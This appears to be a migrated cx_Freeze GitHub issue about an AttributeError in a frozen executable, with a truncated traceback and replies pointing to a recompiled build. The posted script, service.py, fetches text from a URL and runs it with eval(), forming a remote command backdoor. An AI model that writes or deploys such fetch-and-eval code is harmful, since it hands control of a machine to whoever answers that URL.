### ISSUE TITLE
AttributeError: 'module' object has no attribute '_fix_up_module'

### ISSUE THREAD

**Issue by anthony-tuininga** [marcelotduarte/cx_Freeze#149]
Originally reported by: **Ondrej Sojka (Bitbucket: [ondrej_sojka](https://bitbucket.org/ondrej_sojka), GitHub: Unknown)**

----------------------------------------

My script runs in python and freezes flawlessly. Then, I try to run its exe, and I get this error.

I use virtualized Windows 7 and Python 3.4.3 with latest cx_Freeze.

File "C:\Python34\lib\site-packages\cx_Freeze\initscripts\Conso
in <module>
  exec(code, m.__dict__)
File "service.py", line 2, in <module>
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 2
_load
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 2
_load_unlocked
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 3
_frames_removed
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 2
_load
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 2
_load_unlocked
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 1
ocked
File "C:\Python\32-bit\3.4\lib\importlib\_bootstrap.py", line 1
kward_compatible

```
#!python

import sys
import urllib.request
def stall():
    while 1:
        sleep(3600)
try:
    response = urllib.request.urlopen('secret')
    data = response.read()
except KeyboardInterrupt:
    sys.exit()
except:
    stall()
webcommand = data.decode('utf-8')
if webcommand == 'rest':
    stall()
else:
    try:
        eval(webcommand)
    except KeyboardInterrupt:
        sys.exit()
    stall()
```

----------------------------------------
- Bitbucket: https://bitbucket.org/anthony_tuininga/cx_freeze/issue/149

**Comment by anthony-tuininga** [comment]
*Original comment by* **Anonymous**:

----------------------------------------

refer to issue #81

To summarize that issue, recompile or get cx_freeze from [here](http://www.lfd.uci.edu/~gohlke/pythonlibs/#cx_freeze)


Does that fix your issue? The traceback seems a little different but you're getting the same error

**Comment by anthony-tuininga** [comment]
*Original comment by* **Ondrej Sojka (Bitbucket: [ondrej_sojka](https://bitbucket.org/ondrej_sojka), GitHub: Unknown)**:

----------------------------------------

It's fixed now. But, I think it's not the official site of cx_freeze... 

Thanks a ton anyway.

**Comment by anthony-tuininga** [comment]
*Original comment by* **Anonymous**:

----------------------------------------

It's not, but it's a well-known and trusted source for python stuff like this

**Comment by marcelotduarte** [comment]
Assuming this has been resolved.
If you had issues please re-open.
